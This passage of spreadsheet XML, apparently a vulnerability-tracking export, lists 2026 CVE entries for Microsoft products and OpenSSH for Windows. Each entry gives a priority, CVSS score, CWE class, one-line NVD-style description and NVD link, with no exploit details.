        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1098" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="D1098" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1098" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1098" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1098" s="5" t="inlineStr"/>
      <c r="H1098" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1098" s="5" t="inlineStr"/>
      <c r="J1098" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K1098" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L1098" s="5" t="inlineStr"/>
      <c r="M1098" s="5" t="inlineStr"/>
      <c r="N1098" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1098" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1098" s="5" t="inlineStr"/>
      <c r="Q1098" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R1098" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1099" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68887</t>
        </is>
      </c>
      <c r="D1099" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1099" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1099" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1099" s="5" t="inlineStr"/>
      <c r="H1099" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1099" s="5" t="inlineStr"/>
      <c r="J1099" s="5" t="inlineStr"/>
      <c r="K1099" s="5" t="inlineStr"/>
      <c r="L1099" s="5" t="inlineStr"/>
      <c r="M1099" s="5" t="inlineStr"/>
      <c r="N1099" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1099" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1099" s="5" t="inlineStr"/>
      <c r="Q1099" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1099" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t>
        </is>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69329</t>
        </is>
      </c>
      <c r="D1100" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1100" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1100" s="5" t="inlineStr"/>
      <c r="H1100" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I1100" s="5" t="inlineStr"/>
      <c r="J1100" s="5" t="inlineStr"/>
      <c r="K1100" s="5" t="inlineStr"/>
      <c r="L1100" s="5" t="inlineStr"/>
      <c r="M1100" s="5" t="inlineStr"/>
      <c r="N1100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1100" s="5" t="inlineStr"/>
      <c r="Q1100" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="R1100" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t>
        </is>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69342</t>
        </is>
      </c>
      <c r="D1101" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1101" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1101" s="5" t="inlineStr"/>
      <c r="H1101" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I1101" s="5" t="inlineStr"/>
      <c r="J1101" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1101" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1101" s="5" t="inlineStr"/>
      <c r="M1101" s="5" t="inlineStr"/>
      <c r="N1101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1101" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1101" s="5" t="inlineStr"/>
      <c r="Q1101" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1101" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t>
        </is>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69378</t>
        </is>
      </c>
      <c r="D1102" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1102" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1102" s="5" t="inlineStr"/>
      <c r="H1102" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I1102" s="5" t="inlineStr"/>
      <c r="J1102" s="5" t="inlineStr"/>
      <c r="K1102" s="5" t="inlineStr"/>
      <c r="L1102" s="5" t="inlineStr"/>
      <c r="M1102" s="5" t="inlineStr"/>
      <c r="N1102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1102" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1102" s="5" t="inlineStr"/>
      <c r="Q1102" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R1102" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t>
        </is>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69397</t>
        </is>
      </c>
      <c r="D1103" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1103" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1103" s="5" t="inlineStr"/>
      <c r="H1103" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1103" s="5" t="inlineStr"/>
      <c r="J1103" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K1103" s="5" t="inlineStr"/>
      <c r="L1103" s="5" t="inlineStr"/>
      <c r="M1103" s="5" t="inlineStr"/>
      <c r="N1103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1103" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1103" s="5" t="inlineStr"/>
      <c r="Q1103" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1103" s="5" t="inlineStr">
        <is>
          <t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t>
        </is>
      </c>
    </row>
    <row r="1104">
      <c r="A1104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69428</t>
        </is>
      </c>
      <c r="D1104" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1104" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1104" s="5" t="inlineStr"/>
      <c r="H1104" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I1104" s="5" t="inlineStr"/>
      <c r="J1104" s="5" t="inlineStr"/>
      <c r="K1104" s="5" t="inlineStr"/>
      <c r="L1104" s="5" t="inlineStr"/>
      <c r="M1104" s="5" t="inlineStr"/>
      <c r="N1104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1104" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1104" s="5" t="inlineStr"/>
      <c r="Q1104" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1104" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t>
        </is>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69429</t>
        </is>
      </c>
      <c r="D1105" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1105" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1105" s="5" t="inlineStr"/>
      <c r="H1105" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1105" s="5" t="inlineStr"/>
      <c r="J1105" s="5" t="inlineStr"/>
      <c r="K1105" s="5" t="inlineStr"/>
      <c r="L1105" s="5" t="inlineStr"/>
      <c r="M1105" s="5" t="inlineStr"/>
      <c r="N1105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1105" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1105" s="5" t="inlineStr"/>
      <c r="Q1105" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1105" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t>
        </is>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69443</t>
        </is>
      </c>
      <c r="D1106" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1106" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1106" s="5" t="inlineStr"/>
      <c r="H1106" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1106" s="5" t="inlineStr"/>
      <c r="J1106" s="5" t="inlineStr"/>
      <c r="K1106" s="5" t="inlineStr"/>
      <c r="L1106" s="5" t="inlineStr"/>
      <c r="M1106" s="5" t="inlineStr"/>
      <c r="N1106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1106" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1106" s="5" t="inlineStr"/>
      <c r="Q1106" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1106" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t>
        </is>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69514</t>
        </is>
      </c>
      <c r="D1107" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1107" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1107" s="5" t="inlineStr"/>
      <c r="H1107" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1107" s="5" t="inlineStr"/>
      <c r="J1107" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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07" s="5" t="inlineStr"/>
      <c r="M1107" s="5" t="inlineStr"/>
      <c r="N1107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1107" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1107" s="5" t="inlineStr"/>
      <c r="Q1107" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1107" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t>
        </is>
      </c>
    </row>
    <row r="1108">
      <c r="A1108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69539</t>
        </is>
      </c>
      <c r="D1108" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1108" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1108" s="5" t="inlineStr"/>
      <c r="H1108" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1108" s="5" t="inlineStr"/>
      <c r="J1108" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K110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08" s="5" t="inlineStr"/>
      <c r="M1108" s="5" t="inlineStr"/>
      <c r="N1108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1108" s="5" t="inlineStr"/>
      <c r="Q1108" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1108" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t>
        </is>
      </c>
    </row>
    <row r="1109">
      <c r="A1109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69587</t>
        </is>
      </c>
      <c r="D1109" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1109" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1109" s="5" t="inlineStr"/>
      <c r="H1109" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1109" s="5" t="inlineStr"/>
      <c r="J1109" s="5" t="inlineStr"/>
      <c r="K1109" s="5" t="inlineStr"/>
      <c r="L1109" s="5" t="inlineStr"/>
      <c r="M1109" s="5" t="inlineStr"/>
      <c r="N1109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1109" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1109" s="5" t="inlineStr"/>
      <c r="Q1109" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R1109" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t>
        </is>
      </c>
    </row>
    <row r="1110">
      <c r="A1110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69588</t>
        </is>
      </c>
      <c r="D1110" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1110" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1110" s="5" t="inlineStr"/>
      <c r="H1110" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1110" s="5" t="inlineStr"/>
      <c r="J1110" s="5" t="inlineStr"/>
      <c r="K1110" s="5" t="inlineStr"/>
      <c r="L1110" s="5" t="inlineStr"/>
      <c r="M1110" s="5" t="inlineStr"/>
      <c r="N1110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1110" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1110" s="5" t="inlineStr"/>
      <c r="Q1110" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R1110" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t>
        </is>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69599</t>
        </is>
      </c>
      <c r="D1111" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1111" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1111" s="5" t="inlineStr"/>
      <c r="H1111" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1111" s="5" t="inlineStr"/>
      <c r="J1111" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1111" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1111" s="5" t="inlineStr"/>
      <c r="M1111" s="5" t="inlineStr"/>
      <c r="N1111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1111" s="5" t="inlineStr"/>
      <c r="Q1111" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1111" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t>
        </is>
      </c>
    </row>
    <row r="1112">
      <c r="A1112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69607</t>
        </is>
      </c>
      <c r="D1112" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1112" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1112" s="5" t="inlineStr"/>
      <c r="H1112" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1112" s="5" t="inlineStr"/>
      <c r="J1112" s="5" t="inlineStr"/>
      <c r="K1112" s="5" t="inlineStr"/>
      <c r="L1112" s="5" t="inlineStr"/>
      <c r="M1112" s="5" t="inlineStr"/>
      <c r="N1112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1112" s="5" t="inlineStr"/>
      <c r="Q1112" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1112" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t>
        </is>
      </c>
    </row>
    <row r="1113">
      <c r="A1113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69631</t>
        </is>
      </c>
      <c r="D1113" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1113" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1113" s="5" t="inlineStr"/>
      <c r="H1113" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1113" s="5" t="inlineStr"/>
      <c r="J1113" s="5" t="inlineStr"/>
      <c r="K1113" s="5" t="inlineStr"/>
      <c r="L1113" s="5" t="inlineStr"/>
      <c r="M1113" s="5" t="inlineStr"/>
      <c r="N1113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1113" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1113" s="5" t="inlineStr"/>
      <c r="Q1113" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R1113" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t>
        </is>
      </c>
    </row>
    <row r="1114">
      <c r="A1114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69710</t>
        </is>
      </c>
      <c r="D1114" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1114" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1114" s="5" t="inlineStr"/>
      <c r="H1114" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1114" s="5" t="inlineStr"/>
      <c r="J1114" s="5" t="inlineStr"/>
      <c r="K1114" s="5" t="inlineStr"/>
      <c r="L1114" s="5" t="inlineStr"/>
      <c r="M1114" s="5" t="inlineStr"/>
      <c r="N1114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1114" s="5" t="inlineStr"/>
      <c r="Q1114" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1114" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t>
        </is>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69739</t>
        </is>
      </c>
      <c r="D1115" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1115" s="5" t="inlineStr"/>
      <c r="H1115" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I1115" s="5" t="inlineStr"/>
      <c r="J1115" s="5" t="inlineStr"/>
      <c r="K1115" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L1115" s="5" t="inlineStr"/>
      <c r="M1115" s="5" t="inlineStr"/>
      <c r="N1115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1115" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1115" s="5" t="inlineStr"/>
      <c r="Q1115" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1115" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
